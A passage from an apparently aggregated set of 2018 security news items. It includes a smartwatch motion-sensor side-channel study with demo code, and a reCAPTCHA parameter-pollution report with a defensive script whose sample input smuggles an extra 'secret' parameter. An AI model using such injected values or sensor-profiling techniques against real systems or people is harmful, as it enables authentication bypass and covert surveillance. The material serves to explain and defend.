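    return {ax: round(max_cross_correlation(traces_a[ax], traces_b[ax]), 2)
            for ax in AXES}


def demo(seed=1):
    """Compare two attempts by synthetic 'person 1' with one by 'person 2'."""
    rng = random.Random(seed)
    # each synthetic person has a fixed motion "fingerprint" per axis (assumption)
    person1 = {ax: [(2 + i, 0.3 * i), (5 + i, 1.1)] for i, ax in enumerate(AXES)}
    person2 = {ax: [(3 + i, 2.0 + 0.5 * i), (7 + i, 0.4)] for i, ax in enumerate(AXES)}
    p1_first = {ax: make_trace(rng, person1[ax]) for ax in AXES}
    # same person again, typing started 12 samples later
    p1_second = {ax: make_trace(rng, person1[ax], shift=12) for ax in AXES}
    p2_attempt = {ax: make_trace(rng, person2[ax]) for ax in AXES}
    same_person = axis_maxima(p1_first, p1_second)
    different_persons = axis_maxima(p1_first, p2_attempt)
    return same_person, different_persons


if __name__ == "__main__":
    same, different = demo()
    print("One person       ", same)
    print("Different persons", different)
```

The same-person row comes out close to 1.0 on every axis and the different-person row stays low, which is the separation the study's tables exhibit.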

Speaking from the information security point of view, we can conclude that, without a doubt, portable cyberphysical systems expand the attack surface for potential intruders. That said, the main danger lies not in the direct interception of input data — that is quite difficult (the most successful results are achieved using neural networks) and thus far the accuracy leaves much to be desired. It lies instead in the profiling of users’ physical behavior based on signals from embedded sensors. Being “smart,” such devices are able to start and stop logging information from sensors not only through external commands, but on the occurrence of certain events or the fulfillment of certain conditions.

The recorded signals can be transmitted by the phone to the attacker’s server whenever the phone has access to the Internet. So an unassuming fitness app or a new watch face from the Google Play store can be used against you, right now in fact. The situation is compounded by the fact that such an app needs only to send your geotag once and request the email address linked to your Google Play account to determine, based on your movements, who you are, where you’ve been, how you use your smartphone, and when you entered a PIN at an ATM.

We found that extracting data from traffic likely to correspond to a password or other sensitive information (name, surname, email address) is a fairly straightforward task. Applying the full power of available recognition algorithms to these data on a PC or in cloud services, attackers, as shown earlier, can subsequently recover this sensitive information from accelerometer and gyroscope signal logs. Moreover, the accumulation of these signals over an extended period facilitates the tracking of user movements — and that’s without geoinformation services (such as GPS/GLONASS, or base station signals).

We established that the use of simple methods of analyzing signals from embedded sensors such as accelerometers and gyroscopes makes it possible (even with the computing power of a wearable device) to determine the moments when one and the same text is entered (for example, authentication data) to an accuracy of up to 96% for desktop computers and up to 64% for mobile devices. The latter accuracy could be improved by writing more complex algorithms for processing the signals received, but we intentionally applied the most basic mathematical toolbox. Considering that we viewed this experiment through the prism of the threat to corporate users, the results obtained for the desktop computer are a major cause for concern.

A probable scenario involving the use of wearable devices relates to downloading a legitimate app to a smartwatch — for example, a fitness tracker that periodically sends data packets of several dozen kilobytes in size to a server (for example, the uncompressed “signal signature” for the 13-character password was about 48 kilobytes).

Since the apps themselves are legitimate, we assume that, alongside our Android Wear/Android for Smartwatch test case, this scenario can be applied to Apple smartwatches, too.

There are several indications that an app downloaded onto a smartwatch might not be safe.

If, for instance, the app requests access to data about the user’s account (the GET_ACCOUNTS permission in Android), this is cause for concern, since cybercriminals need to match the “digital fingerprint” with its owner. However, the app can also allow the user to register by providing an email address; in this case you are at least free to enter an address different from that of the Google Play account to which your bank card is linked.

If the app additionally requests permission to send geolocation data, your suspicions should be aroused even further. The obvious advice in this situation is not to give additional permissions to fitness trackers that you download onto your smartwatch, and to specify a company email address at the time of registration.

A short battery life can also be a serious cause for concern. If your gadget discharges in just a few hours, this is a sign that you may be under observation. Theoretically, a smartwatch can store logs of your activity covering dozens of hours and upload this data later.

In general, we recommend keeping a close eye on smartwatches sported by employees at your office, and perhaps regulating their use in the company’s security policies. We plan to continue our research into cyberphysical systems such as wearable smart gadgets, and the additional risks of using them.

PE Firm Thoma Bravo Buys Majority Stake in LogRhythm
1.6.2018 securityweek IT

Private equity firm Thoma Bravo announced on Thursday that it will acquire a majority interest in Security Information and Event Management (SIEM) solutions vendor LogRhythm.

Terms of the deal, which is expected to close in Q3 2018, were not disclosed.

Founded in 2003, LogRhythm is a veteran security firm that has raised more than $110 million in funding and has more than 2,500 customers around the world using its platform, which combines traditional SIEM capabilities with user and entity behavior analytics (UEBA).

“Thoma Bravo has long admired the work of Andy, Chris, Phil Villella and the entire LogRhythm team,” said Seth Boro, a managing partner at Thoma Bravo. “The company’s impressive track record of growth shows the continued demand for LogRhythm’s differentiated offerings. With Thoma Bravo’s investment, we look to further accelerate product innovation and drive continued customer success.”

Thoma Bravo has made several large investments in the cybersecurity space over the years. Its portfolio includes SonicWall, SailPoint, Hyland Software, Deltek, Blue Coat Systems, Imprivata, Bomgar, Barracuda Networks, Compuware and SolarWinds.

ProtonMail Launches VPN Application for macOS
1.6.2018 securityweek Apple

Encrypted email service provider ProtonMail on Wednesday announced the availability of a virtual private network (VPN) service for macOS users.

Initially introduced for some of its paid ProtonMail users in early 2017, the VPN service saw a wider launch on Windows last year, and also arrived on Android in January 2018. Last year, the CERN-founded company also launched a Tor hidden service and an encrypted contacts manager.

Following a beta testing period, the Swiss-based service provider is now making the VPN application available for all macOS users, allowing them to easily protect their Internet connections. Users who already have a ProtonVPN or ProtonMail account only need to download the application, log in, and start using it immediately.

Developed by the same team behind ProtonMail, the VPN service takes advantage of technologies such as Secure Core and Tor integration and is available for free with no ads. Furthermore, the company claims that users can enjoy it without worrying about malware or monetization of user data.

“With our VPN for Mac application, it is now extremely simple to switch countries, create custom profiles, connect to the Tor network, and route your traffic through our Secure Core servers. Not to mention all the essential perks of ProtonVPN, like hiding your IP address, defending against cyber-attacks, and unblocking censored content,” ProtonMail says.

Users opting for the free plan get unlimited bandwidth and access to servers in three continents. Upgrade options are available for those looking to gain access to more servers and extra features.

Many members of the ProtonMail community have requested the macOS app, the company says. Over the past months, the service provider has worked closely with over ten thousand beta testers to address bugs in the application and ensure it is not only easy to use, but also visually appealing.

The macOS app also takes advantage of the modern IKEv2 protocol for higher performance, providing users with a faster and more stable connection (it promises speeds of more than 300 Mbps, under the right conditions).

Users will be able to easily connect to any country with a single click, to choose from the available Secure Core servers, Tor servers, and P2P servers, and to create and save custom connection profiles. A VPN kill switch is also available, designed to cut the Internet if the connection to the VPN drops, thus preventing data from leaking when the VPN is not connected.

“More people are starting to wake up to the fact that privacy matters, and it is important to make tools like VPN widely accessible, especially for the over 1.5 billion people around the world who live under Internet surveillance and censorship,” Dr. Andy Yen, CEO of ProtonMail, said in a statement.

German Spy Agency Can Keep Tabs on Internet Hubs: Court
1.6.2018 securityweek  BigBrothers

Germany's spy agency can monitor major internet hubs if Berlin deems it necessary for strategic security interests, a federal court has ruled.

In a ruling late on Wednesday, the Federal Administrative Court threw out a challenge by the world's largest internet hub, the De-Cix exchange, against the tapping of its data flows by the BND foreign intelligence service.

The operator had argued the agency was breaking the law by capturing German domestic communications along with international data.

However, the court in the eastern city of Leipzig ruled that internet hubs "can be required by the federal interior ministry to assist with strategic communications surveillance by the BND".

De-Cix says its Frankfurt hub is the world's biggest internet exchange, bundling data flows from as far as China, Russia, the Middle East and Africa, which handles more than six terabytes per second at peak traffic.

De-Cix Management GmbH, which is owned by eco Association, the European internet industry body, had filed suit against the interior ministry, which oversees the BND and its strategic signals intelligence.

It said the BND, a partner of the US National Security Agency (NSA), has placed so-called Y-piece prisms into its data-carrying fibre optic cables that give it an unfiltered and complete copy of the data flow.

The surveillance sifts through digital communications such as emails using certain search terms, which are then reviewed based on relevance.

De-Cix said in a statement Thursday that it believed the ruling shielded it from criminal liability for violations of the law protecting German domestic communications against tapping by stating that the German government bore responsibility.

However, it said it would review whether to take its complaint to the Federal Constitutional Court.

Given the mass of daily phone calls, emails, chats, internet searches, streamed videos and other online communications, an effective fire-walling of purely German communications is unrealistic, activists argue.

Germany had reacted with outrage when information leaked by former NSA contractor Edward Snowden revealed in 2013 that US agents were carrying out widespread tapping worldwide, including of Chancellor Angela Merkel's mobile phone.

Merkel, who grew up in communist East Germany where state spying on citizens was rampant, declared repeatedly that "spying among friends is not on" while acknowledging Germany's reliance on the US in security matters.

But to the great embarrassment of Germany, it later emerged that the BND helped the NSA spy on European allies.

Berlin in 2016 approved new measures, including greater oversight, to rein in the BND following the scandal.

Yes, Germany’s BND foreign intelligence service can spy on the world’s biggest internet exchange

1.6.2018 securityaffairs BigBrothers

This week, a federal court has ruled that Germany’s BND foreign intelligence service can monitor major internet hubs for strategic security interests.
Recently, the operator of the world’s top Internet Hub sued the BND foreign intelligence service for the surveillance activity conducted by the spy agency.

The operator wants to be sure that the agency is not violating any law by monitoring German domestic communications as well as tapping international traffic through the De-Cix exchange.

The De-Cix exchange, based in Frankfurt, is the world’s biggest internet exchange and occupies a privileged position for traffic monitoring.

The hub sees more than six terabytes per second at peak traffic from China, Russia, the Middle East and Africa.

The federal court in Leipzig ruled that internet hubs “can be required by the federal interior ministry to assist with strategic communications surveillance by the BND”.

The hub is operated by the De-Cix Management GmbH, which is owned by the European internet industry organization eco Association.

The eco Association filed suit against Germany’s interior ministry over its surveillance activities.

“We consider ourselves under obligation to our customers to work towards a situation in which strategic surveillance of their telecommunications only takes place in a legal manner,” the body states.

The mutual support between the US NSA and the BND has been extensively documented in the past.

In June 2015, Wikileaks released another collection of documents on the extensive economic espionage activity conducted by the NSA in Germany. At the time, the cyberspies were particularly interested in the Greek debt crisis. The US intelligence targeted German government representatives due to their privileged position in the negotiations between Greece and the EU.

In August 2015, the German weekly Die Zeit disclosed documents revealing how German intelligence struck a deal with the NSA to gain access to the surveillance platform XKeyscore.

Internal documents reported that Germany’s domestic intelligence agency, the Federal Office for the Protection of the Constitution (BfV), received the software program XKeyscore from the NSA in return for data from Germany.

Back in 2011, the NSA demonstrated the capabilities of the XKeyscore platform to the BfV. After two years of negotiation, the BfV signed an agreement to receive the NSA software and install it to analyze metadata collected on German citizens. In return, the German agency promised to share the metadata it collected.

The NSA tool collects ‘nearly everything a user does on the internet’; XKeyscore provides the ‘widest-reaching’ collection of online data, analyzing the content of emails, social media activity and browsing history.

In 2013, documents leaked by Edward Snowden explained that a tool named DNI Presenter allows the NSA to read the content of stored emails and also enables intelligence analysts to track a user’s activity on Facebook through the XKeyscore system.

XKeyscore map used also by BND

According to Die Zeit, the document “Terms of Reference” stated: “The BfV will: To the maximum extent possible share all data relevant to NSA’s mission”.

In June 2016, the German government approved new measures to rein in the BND after the scandal over its support for NSA surveillance.

US Federal court judge rejected a lawsuit by Kaspersky against the ban on its products
1.6.2018 securityaffairs BigBrothers

A US Federal court judge, Colleen Kollar-Kotelly, rejected a lawsuit by Russian cybersecurity firm Kaspersky Lab against the ban on the use of its solutions by government agencies.
On Wednesday, US Federal court judge Colleen Kollar-Kotelly rejected a lawsuit by Russian cybersecurity firm Kaspersky Lab against the ban on the use of its solutions by government agencies.

The ban on Kaspersky software, imposed by the US Department of Homeland Security, started in September 2017.

In December, Kaspersky Lab sued the U.S. Government over the product ban. Its appeal was filed in the U.S. District Court for the District of Columbia, just a week after US President Donald Trump signed a bill that bans the use of Kaspersky Lab products and services in federal agencies.

Section 1634 of the bill prohibits the use of security software and services provided by the security giant; the ban takes effect on October 1, 2018.

Below are the details of the ban included in Section 1634 of the National Defense Authorization Act for Fiscal Year 2018.

“SEC. 1634. Prohibition on use of products and services developed or provided by Kaspersky Lab.

(a) Prohibition.—No department, agency, organization, or other element of the Federal Government may use, whether directly or through work with or on behalf of another department, agency, organization, or element of the Federal Government, any hardware, software, or services developed or provided, in whole or in part, by—

(1) Kaspersky Lab (or any successor entity);
(2) any entity that controls, is controlled by, or is under common control with Kaspersky Lab; or
(3) any entity of which Kaspersky Lab has majority ownership.

(b) Effective date.—The prohibition in subsection (a) shall take effect on October 1, 2018.”

US officials believe Russian intelligence could use the Kaspersky software to spy on the systems running it.

Back to the present, Federal court judge Colleen Kollar-Kotelly rejected the lawsuit, reaffirming the right of the government to choose its providers to protect the security of its infrastructure.

The ban “does not inflict ‘punishment’ on Kaspersky Lab,” Kollar-Kotelly said in her ruling.

“It eliminates a perceived risk to the nation’s cybersecurity and, in so doing, has the secondary effect of foreclosing one small source of revenue for a large multinational corporation,” said Kollar-Kotelly.

The judge rejected Kaspersky’s complaint that the US Government had illegally denied the firm’s “right” to sell a product, and she also remarked that the ban is legal and will remain in place.

The impact on Kaspersky was severe; other governments also expressed concern that its solutions could be hacked as part of cyber espionage campaigns.

Many companies in the US have already stopped using Kaspersky software, and most major stores have stopped selling it.

While the private company does not report its earnings, sales internationally have also reportedly been hurt.

North Korea-linked Andariel APT Group exploited an ActiveX Zero-Day in recent attacks
1.6.2018 securityaffairs APT

A North Korea-linked APT group, tracked as Andariel Group, leveraged an ActiveX zero-day vulnerability in targeted attacks against South Korean entities.
According to a report published by South Korean cyber-security firm AhnLab, the Andariel Group is a division of the dreaded Lazarus APT Group, and it has already exploited ActiveX vulnerabilities in past attacks.

The attackers exploited at least nine separate ActiveX vulnerabilities, including a new zero-day flaw, in a wave of watering hole attacks aimed at infecting visitors of compromised websites with a backdoor trojan.

The zero-day vulnerability seems to be connected to a series of attacks against Samsung SDS Acube installations.

Acube is an application developed by Samsung’s enterprise division, widely used in South Korean enterprises, that supports ActiveX controls to implement interactive features.

“According to the security industry, from late last month until this month, attacks against North Korean research institutes and websites have been spotlighted.” reported the local media DDaily.

“The attacker, who is believed to be carrying the Andaleri Group, exploited about 9 ActiveX vulnerabilities, including Samsung SDS “eCube”, and tried to collect information through a water ring attack.”

The malicious code was used to control the infected systems and gather intelligence.

“The zero-day vulnerability has been found in this attack, but it is unclear whether the attacker actually used it,” said a government official from the Korea Internet & Security Agency (KISA).

Simon Choi (tweet, 10:28 AM - May 29, 2018): “Operation GoldenAxe. North Korea's cyber attack only on South Korea (using ActiveX vuln) from 2007 to 2018.”

Samsung addressed the Acube zero-day flaw with the release of an update, while South Korea’s CERT team has issued a security advisory for the zero-day issue.

North Korea-linked APT groups are among the most active threat actors; recently the US-CERT issued an alert on two malware families associated with the North Korea-linked APT Hidden Cobra, Brambul and Joanap.

Senators Ask National Security Advisor to Save Cybersecurity Coordinator Role
31.5.2018 securityweek BigBrothers

A group of Democratic senators is urging National Security Advisor John Bolton to reconsider the decision to eliminate the role of cybersecurity coordinator, arguing that it represents a step in the wrong direction.

Bolton announced the decision to cut the cybersecurity role following the departure of Rob Joyce. The National Security Council (NSC) said the move was part of an effort to streamline authority, noting that the duties of the cybersecurity coordinator would be taken over by two other senior directors.

“Streamlining management will improve efficiency, reduce bureaucracy and increase accountability,” the NSC said at the time.

Cybersecurity experts and several lawmakers contested the decision after it was announced. On Wednesday, Senator Amy Klobuchar and 18 other senators sent a letter to Bolton urging him to reconsider his recommendation, citing increasingly frequent and sophisticated cyber operations, particularly ones believed to have been launched by Russia.

“Our country’s cybersecurity should be a top priority; therefore, it is critically important that the U.S. government present a unified front in defending against cyberattacks,” the senators wrote. “Eliminating the Cybersecurity Coordinator role keeps us from presenting that unified front and does nothing to deter our enemies from attacking us again. Instead, it would represent a step in the wrong direction.”

While there are a few private-sector cybersecurity professionals who applaud the decision, many believe eliminating the role is a big mistake.

“The removal of the cybersecurity position will leave the Trump administration flat footed the next time a major cyber event does happen. In situations where minutes matter, the most prepared person in the room almost always carries the day. In a room full of decision makers with no cyber security background and a general who is in charge of fighting cyber wars, it is a foregone conclusion as to whom will have the strongest voice in the room,” Ross Rustici, senior director of intelligence services at Cybereason, told SecurityWeek.

“Every cyber event will become a military issue with a military solution. Regardless of the efficacy of the position or those who occupied it, the fact that the position existed demonstrated a commitment to understanding, managing, and responding to cyber threats in a way that was on par with the other major global issues of the day. The absorption of that position into someone else’s duties makes cyber outside of the military context an ‘other duties as assigned’ mission. This will lead to a marginalization of the knowledge and strategy,” Rustici added.

HTTP Parameter Pollution Leads to reCAPTCHA Bypass
31.5.2018 securityweek Security

Earlier this year, a security researcher discovered that it was possible to bypass Google’s reCAPTCHA via HTTP parameter pollution.

The issue, application and cloud security expert Andres Riancho says, can be exploited when a web application crafts the request to /recaptcha/api/siteverify in an insecure way. Exploitation allows an attacker to bypass the protection every time.

When a web application using reCAPTCHA challenges the user, “Google provides an image set and uses JavaScript code to show them in the browser,” the researcher notes.

After solving the challenge, the user clicks verify, which triggers an HTTP request to the web application, which in turn verifies the user’s response with a request to Google’s reCAPTCHA API.

The application authenticates itself and sends a {reCAPTCHA-generated-hash} to the API to query the response. If the user solved the challenge correctly, the API sends an "OK" that the web application receives, processes, and most likely grants the user access to the requested resource.

Riancho discovered that an HTTP parameter pollution flaw in the web application could be used to bypass reCAPTCHA (a precondition that, however, reduced the severity of the vulnerability).

“HTTP parameter pollution is almost everywhere: client-side and server-side, and the associated risk depends greatly on the context. In some specific cases it could lead to huge data breach, but in most cases it is a low risk finding,” Riancho explains.

He notes that it was possible to send two HTTP requests to Google’s service and receive the same response. The reCAPTCHA API would always use the first secret parameter on the request but ignore the second, an issue the researcher was able to exploit.

Additionally, Google provides web developers who want to test their web applications with a hard-coded site key and secret key that disable reCAPTCHA verification in staging environments, and the bypass leverages this functionality as well.

“If the application was vulnerable to HTTP parameter pollution AND the URL was constructed by appending the response parameter before the secret then an attacker was able to bypass the reCAPTCHA verification,” the researcher notes.

Two requirements must be met for the vulnerability to be exploitable: the web application needs to have an HTTP parameter pollution flaw in the creation of the reCAPTCHA URL, and it must build the URL with the response parameter first and the secret after it. Overall, only around 3% of reCAPTCHA implementations would be vulnerable.

Riancho points out that Google addressed the issue in the REST API by returning an error when the HTTP request to /recaptcha/api/siteverify contains two parameters with the same name.

“Fixing it this way they are protecting the applications which are vulnerable to the HTTP Parameter Pollution and the reCAPTCHA bypass, without requiring them to apply any patches,” the researcher notes.
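The two preconditions and Google's fix all come down to how one query string is built and parsed. As an added example (not the researcher's or Google's code), the Python below places the insecure URL construction the article describes next to a hardened one and implements the duplicate-parameter check the fix introduced; the secret values and the polluted sample input are constructed placeholders.

```python
"""Insecure vs. hardened construction of the reCAPTCHA siteverify request.

Added example, not code from the researcher's write-up or from Google.
APP_SECRET and the sample inputs are constructed placeholders.
"""
from urllib.parse import parse_qsl, urlencode, urlsplit

SITEVERIFY = "https://www.google.com/recaptcha/api/siteverify"
APP_SECRET = "APP_SECRET_PLACEHOLDER"  # constructed placeholder, not a real key


def build_url_insecure(user_response):
    """The pattern the article calls vulnerable: the user-controlled response
    value is concatenated raw and placed before the secret, so a literal '&'
    inside it introduces extra parameters."""
    return f"{SITEVERIFY}?response={user_response}&secret={APP_SECRET}"


def build_url_hardened(user_response):
    """Every value is percent-encoded by urlencode, so '&' or '=' inside the
    response cannot act as a separator; the secret is also placed first."""
    query = urlencode({"secret": APP_SECRET, "response": user_response})
    return f"{SITEVERIFY}?{query}"


def parameter_counts(url):
    """Count how many times each parameter name occurs in the query string."""
    counts = {}
    for name, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        counts[name] = counts.get(name, 0) + 1
    return counts


def has_duplicate_parameters(url):
    """The server-side check the article credits to Google's fix: a request
    whose query carries the same parameter name twice is rejected."""
    return any(count > 1 for count in parameter_counts(url).values())


def first_occurrence_wins(url):
    """Model of a parser that keeps the first value for each name, the
    behaviour the article says the API had before the fix."""
    result = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        result.setdefault(name, value)
    return result


if __name__ == "__main__":
    # constructed input carrying an injected parameter separator
    polluted = "token-placeholder&secret=INJECTED_PLACEHOLDER"
    for label, url in (("insecure", build_url_insecure(polluted)),
                       ("hardened", build_url_hardened(polluted))):
        print(label, parameter_counts(url),
              "rejected" if has_duplicate_parameters(url) else "accepted",
              first_occurrence_wins(url)["secret"])
```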

The issue was reported to Google on January 29, and a patch was released on March 25. The search giant paid the researcher $500 for the discovery.

U.S. Judge Rejects Kaspersky Suit Against Govt Ban on its Products
31.5.2018 securityweek BigBrothers

Washington - A Washington judge on Wednesday rejected a lawsuit by Russian computer security company Kaspersky Lab against the ban on use of its anti-virus software by government agencies.

Kaspersky had complained that the ban -- announced after officials said Russian intelligence was able to hack the software for espionage purposes -- was in effect a "punishment" of the company without it having been given any kind of hearing.

Federal court judge Colleen Kollar-Kotelly rejected the argument, saying the US government had the right to institute the ban to defend its computer security.

The ban "does not inflict 'punishment' on Kaspersky Lab," Kollar-Kotelly said in her ruling.

"It eliminates a perceived risk to the nation's cybersecurity and, in so doing, has the secondary effect of foreclosing one small source of revenue for a large multinational corporation," she said.

She also rejected the global cybersecurity giant's complaint that it had been illegally denied the "right" to sell a product that is legal, and that the ban harmed its reputation.

While the company can still market its products, she said, the government has no obligation to buy them.

In addition, she said, as the ban is legal and will remain in place, nothing can be done about any harm to its reputation.

The ban began with a directive in September 2017 from the Department of Homeland Security for government agencies to remove Kaspersky software from their computing systems.

That has since been followed by a provision set by Congress in a budget bill prohibiting agencies from using Kaspersky software.

Both came after the National Security Agency, the US signals intelligence body, determined that Kaspersky software on an NSA employee's private computer allowed hackers, believed to be from Russian intelligence, to steal top secret NSA materials.

US officials have also expressed concern about alleged ties between Kaspersky and the Russian government, which the company denies.

The impact on the company has been heavy. Most US companies have moved to stop using its software, and most major stores have stopped selling it.

While the private company does not report its earnings, sales internationally have also reportedly been hurt.

Operator of World's Top Internet Hub Sues German Spy Agency
31.5.2018 securityweek BigBrothers

Berlin - The operator of the world's largest internet hub challenged the legality of sweeping telecoms surveillance by Germany's spy agency, a German court heard Wednesday.

The BND foreign intelligence service has long tapped international data flows through the De-Cix exchange based in the German city of Frankfurt.

But the operator argues the agency is breaking the law by also capturing German domestic communications.

"We have grave doubts about the legality of the current practice," said a statement Wednesday on the website of De-Cix Management GmbH, which is owned by European internet industry body the eco association.

"We consider ourselves under obligation to our customers to work towards a situation in which strategic surveillance of their telecommunications only takes place in a legal manner."

Its lawyer Sven-Erik Heun told German news agency DPA that "the BND has chosen the biggest pond to go fishing in".

De-Cix Management launched its suit against the German interior ministry, which oversees the BND and its strategic signals intelligence.

"With the lawsuit, we seek judicial clarification and, in particular, legal certainty for our customers and our company," the company said.

The federal administrative court in the eastern city of Leipzig was not certain to make a ruling on Wednesday.

Given the mass of daily phone calls, emails, chats, internet searches, streamed videos and other online communications, an effective fire-walling of purely German communications is unrealistic, activists argue.

The De-Cix operator says its Frankfurt hub is the world's biggest Internet Exchange, bundling data flows from as far as China, Russia, the Middle East and Africa, and handles more than 6 terabits per second at peak traffic.

The De-Cix, with 20 data centres, uses more electricity than Frankfurt international airport, the Sueddeutsche Zeitung daily reported this week.

It said the BND, a partner of the US National Security Agency (NSA), has placed so-called Y-piece prisms into its data-carrying fibre optic cables that give it an unfiltered and complete copy of the data flow.

Tens of Vulnerabilities Found in Pentagon Travel Management System
31.5.2018 securityweek 

HackerOne announced on Wednesday the results of “Hack the DTS,” the fifth bug bounty program run by the U.S. Department of Defense (DOD).

The DTS (Defense Travel System) is a fully integrated and automated travel management system created specially for the DOD. The platform is said to be accessed by roughly 100,000 unique users every day, including for creating authorizations, receiving approvals, preparing reservations, and generating travel vouchers.

The Pentagon wanted to test the security of the platform and selected 19 vetted hackers from HackerOne to complete the task. Researchers, mainly from the United States and the United Kingdom, submitted more than 100 vulnerability reports, 65 of which were classified as unique and valid, including 28 that described critical and high severity flaws.

White hat hackers earned a total of $78,650 for their findings, with the highest single payout, $5,000, paid out eight times.

“DTS is relied on by DoD travelers. More than 9,500 sites operate worldwide, and the security of these systems is mission-critical,” said Jack Messer, project lead at Defense Manpower Data Center (DMDC). “The ‘Hack the DTS’ challenge helped uncover vulnerabilities we wouldn’t have found otherwise, complementing the great work DMDC is already doing to protect critical enterprise systems and the people those systems serve.”

HackerOne pointed out that Hack the DTS was the second government bug bounty program that allowed participants to use social engineering.

The Pentagon has awarded researchers hundreds of thousands of dollars for finding thousands of vulnerabilities in its systems. The money was paid out through the Hack the Pentagon, Hack the Air Force, Hack the Army, and Hack the Air Force 2.0 bug bounty programs.

North Korea-Linked Group Stops Targeting U.S.
31.5.2018 securityweek BigBrothers

A threat actor linked to North Korea’s Lazarus Group has stopped targeting organizations in the United States, but remains active in Europe and East Asia.

The group, tracked by industrial cybersecurity firm Dragos as Covellite, has been known to target civilian electric energy organizations in an effort to collect intellectual property and information on industrial operations.

Unlike some of the other actors whose activities have been monitored by Dragos, Covellite does not currently have the capability to disrupt industrial control systems (ICS). However, the security firm does see it as a primary threat to the ICS industry.

Covellite’s campaigns have been aimed at organizations in Europe, East Asia and North America. One of the operations, conducted in September 2017, targeted U.S. electric companies and involved phishing emails and malicious Word documents designed to deliver a piece of malware.

FireEye analyzed those attacks and linked them to an actor affiliated with the North Korean government. The security firm published a report in October 2017 and noted that the actor appeared to lack the ability to disrupt power supply.

A blog post published by Dragos on Thursday does not mention North Korea, but researchers pointed out that Covellite’s infrastructure and malware are similar to ones associated with the group known as Lazarus and Hidden Cobra.

“Technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits. However, aside from technical overlap, it is not known how the capabilities and operations between COVELLITE and LAZARUS are related,” explained Sergio Caltagirone, director of threat intelligence at Dragos.

According to Dragos, Covellite has been around since 2017 and is still active, but it has recently stopped targeting organizations in North America, while continuing to attack entities in Europe and East Asia.

“Given the group’s specific interest in infrastructure operations, rapidly improving capabilities, and history of aggressive targeting, Dragos considers this group a primary threat to the ICS industry,” said Caltagirone.

While Covellite may no longer be targeting organizations in the United States, that does not mean all North Korea-linked groups have done the same. Several cybersecurity firms told CyberScoop this week that North Korea has still launched attacks on businesses in the U.S.

Dragos has published brief reports on several of the groups that pose a threat to ICS, including Iran-linked Chrysene, Russia-linked Allanite, and Xenotime, the group believed to be behind the Triton/Trisis attacks.

Fraud Protection Firm Signifyd Raises $100 Million
31.5.2018 securityweek  IT 

Signifyd, a San Jose, CA-based company that specializes in fraud protection solutions for e-commerce businesses, on Wednesday announced that it raised $100 million in a Series D funding round.

The round was led by Premji Invest, with participation from existing investors Bain Capital Ventures, Menlo Ventures, American Express Ventures, IA Ventures, Allegis Cyber and Resolute Ventures.

This brings the total raised by the company to date to $187 million, including $56 million secured in 2017 and $20 million in the previous year. Bloomberg reported that the company has been valued at roughly $400 million following the latest funding round.

Signifyd says it will use the funds to further accelerate its growth. The company claims the number of global e-commerce businesses it protects has doubled to more than 10,000. Signifyd customers include Build.com, Helly Hansen, iRobot, Walmart-owned Jet, Lacoste, Luxottica, Stance, Tous and Wayfair.

The company recently partnered with Magento, the open-source e-commerce platform, which Adobe agreed to buy for $1.68 billion.

Signifyd provides a solution that helps organizations identify fraudulent online orders by using a combination of machine learning, data science research and behavior technology. The solution should help reduce the risk of chargebacks and fraud without having a negative impact on customer experience.

Last month, the company opened its first European office in Barcelona, Spain.

“The fraud detection and prevention market is estimated to reach nearly $42 billion by 2022,” said Raj Ramanand, CEO and co-founder of Signifyd. “However, while fraud remains a serious concern, transactions wrongly declined due to suspected fraud represents a bigger problem of more than $150 billion a year. A wrong decline can push consumers to abandon the merchant and thereby erode customer lifetime value. With this funding, we’re looking to continue to enable friction-free e-commerce for enterprise and omnichannel retailers globally.”

The Current Limitations and Future Potential of AI in Cybersecurity
31.5.2018 securityweek  Cyber

A recent NIST study shows the current limitations and future potential of machine learning in cybersecurity.

Published Tuesday in the Proceedings of the National Academy of Sciences, the study focused on facial recognition and tested the accuracy of a group of 184 humans and the accuracy of four of the latest facial recognition algorithms. The humans comprised 87 trained professionals, 13 so-called 'super recognizers' (who simply have an exceptional natural ability), and a control group of 84 untrained individuals.

Reassuringly, the trained professionals performed significantly better than the untrained control groups. Surprisingly, however, neither human experts nor machine algorithms alone provided the most accurate results. The best performance came from combining a single expert with the best algorithm.

"Our data show that the best results come from a single facial examiner working with a single top-performing algorithm," commented NIST electronic engineer P. Jonathon Phillips. "While combining two human examiners does improve accuracy, it's not as good as combining one examiner and the best algorithm."

"The NIST study used a form of deep learning known as convolutional neural networks that has been proven effective for image recognition because it performs comparative analysis based on pixels rather than the entire image. This is like looking at the individual trees rather than the forest, to use a colloquialism," explains Chris Morales, head of security analytics at Vectra.

The question asked by the NIST researchers was how many humans or machines combined would lead to the lowest error rate of judgement when comparing two photos to determine if they are of the same person -- with no errors being a perfect score. The outcome of their research was that combining man and machine produces a higher rate of accuracy for a single worker, which resulted in higher productivity. This result occurred because man and machine have different strengths and weaknesses that can be leveraged and mitigated by working together.

"What the researchers found," continued Morales, "was the best machine performed in the same range as the best humans. In addition, they found that combining a single facial examiner with machine learning yielded a perfect accuracy score of 1.0 (no errors). To achieve this same 1.0 accuracy level without machine learning required either four trained facial examiners or three super recognizers."

If these results are typical across the increasing use of artificial intelligence (AI) in cyber security -- and Morales believes the study is representative of the value of AI -- it implies we are rapidly approaching a tipping point. Right now, algorithms are not significantly better than trained professionals, but if used by a trained professional they can improve performance and reduce required manpower levels.

While AI itself is not new, it has grown dramatically in use and capability over just the last few years. "If we had done this study three years ago, the best computer algorithm's performance would have been comparable to an average untrained student," NIST's Phillips said. "Nowadays, state-of-the-art algorithms perform as well as a highly trained professional."

The implication is that we are not yet ready to rely solely on the decisions of machine learning algorithms, but that day is surely coming if algorithm quality continues to improve. We have, however, already reached the point where AI can decrease our reliance on human resources. The best results came not from a team of experts combined with machine learning, but from a single professional working with the best algorithm.

"It is often the case that the optimum solution to a new problem is found with the combination of human and machine," comments Tim Sadler, CEO and co-founder of machine learning email security firm Tessian. "However, as more labelled data becomes available, and more researchers look into the problem, machine learning models generally become more accurate and autonomous, reducing the need for a human 'operator'. A good example of this is medical imaging diagnosis, where deep learning models now greatly outperform radiologists in the early diagnosis of cancerous tissues and will soon become the AI 'silver bullet'."

He doesn't believe that facial recognition algorithms have reached that stage yet.

"Facial recognition technology is fairly new, and although machine learning is quickly disrupting the industry, clearly the technology is not perfect; for example, there have been instances where facial recognition technology has authenticated through family likeness," Sadler said. "It will take years of close partnership between facial recognition experts and their machine learning counterparts working together, with the experts overriding the machine's mistakes and correctly labelling the data, before a similar disruption is seen."

